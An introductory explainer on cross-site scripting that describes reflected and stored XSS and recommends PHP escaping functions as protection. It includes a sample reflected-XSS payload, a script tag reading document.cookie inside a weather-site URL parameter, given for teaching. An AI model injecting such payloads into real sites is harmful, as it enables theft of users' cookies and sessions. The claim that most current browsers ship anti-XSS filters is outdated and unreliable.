What is a Cross-Site Scripting vulnerability ?

An XSS (also known as Cross-Site Scripting) is a vulnerability that allows code injection (any language interpreted by a browser) into a website to change its way of displaying. It is mostly due to programming errors or too much confidence in a user's inputs.
There are two types of XSS vulnerabilities : Reflected XSS (or non-persistent) and Stored XSS (or persistent).

An XSS vulnerability would allow an individual to :

  • Make redirections in order to perform phising

  • Steal informations (Cookies, sessions ...)

  • Perform actions on the vulnerable site without the victim's knowledge

Reflected XSS (or non-persistent)

It is called non-persistent because it is not stored in a file or in a database. This type of XSS vulnerability does not store malicious content on the web server. For example, the content is delivered to the victim via a URL that contains it (sent by email or by other means).

Most web browsers have integrated in their latest versions an anti-XSS filter (Chrome, IE, Safari, Opera, Edge). It analyzes the rendering of a page sent by the server and removes any occurrence of javascript that would also be present in the client request. This protects users from a Reflected XSS but not from a Persistent XSS.

Example :

You are browsing a site allowing you to see the weather forecast for a given city. The name of the city is provided in the URL of the page via a parameter "GET", like this way: www.meteo.com/previsionsmeteo?ville=Montpellier

The forecast for the city of Montpellier will be displayed on the page returned by the server of the weather website. The hacker can use the same URL to provide malicious content like this way: www.meteo.com/previsionsmeteo?ville=Montpellier<script>alert(document.cookie) ;</script>

With such content in the URL, the web server will therefore display the weather forecast for Montpellier, but will potentially also include dangerous content in the page.

Stored XSS (or persistent)

The persistent XSS vulnerabilty is the most dangerous one because it will be executed each time the site is loaded. In fact, the latter is stored either in a file or in a database. Let us take for example a discussion forum.
The attacker posts a message or comment containing malicious content. When other users visit the page, containing the fraudulent message or comment, this one is executed.

How to protect you against Cross-Site Scripting vulnerabilities?

The most suitable solution against this vulnerability is to use the “htmlspecialchars()” function. This function allows to filter icons such as <, & or ", replacing them by their equivalent in HTML language. For instance :

  • The symbol & becomes &amp;
  • The symbol " becomes &quot;
  • The symbol ' becomes &#39;

You can also use PHP function "htmlentities ()": Converting characters into entities is often used to prevent browsers from using it as an HTML element. This can be particularly useful for preventing code execution when users can access to the display entry on a page.